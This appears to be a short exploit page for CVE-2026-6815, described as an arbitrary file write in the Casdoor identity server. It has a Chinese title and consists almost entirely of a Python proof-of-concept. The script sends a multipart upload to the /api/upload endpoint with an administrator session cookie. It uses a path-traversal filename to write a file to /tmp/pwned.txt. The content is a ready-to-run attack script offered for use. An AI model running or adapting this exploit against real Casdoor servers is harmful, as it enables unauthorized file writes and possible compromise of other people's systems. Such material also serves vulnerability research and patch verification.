CVE-2026-6815 Casdoor 任意文件写入漏洞

import requests def exploit_cve_2026_6815(target_url, admin_cookie): """ PoC for CVE-2026-6815: Arbitrary File Write via Path Traversal in Casdoor. """ upload_endpoint = f"{target_url}/api/upload" # Path traversal payload to write to /tmp/pwned.txt # Adjust the path based on the target OS (e.g., '../../..') filename = "../../../../../../../../tmp/pwned.txt" files = { 'file': (filename, 'CVE-2026-6815 Exploit Content', 'text/plain') } cookies = { 'casdoor_session_id': admin_cookie } try: response = requests.post(upload_endpoint, files=files, cookies=cookies) if response.status_code == 200: print(f"[+] Success: File written to {filename}") else: print(f"[-] Failed: Status code {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Example usage exploit_cve_2026_6815("http://localhost:8000", "valid_admin_cookie_here")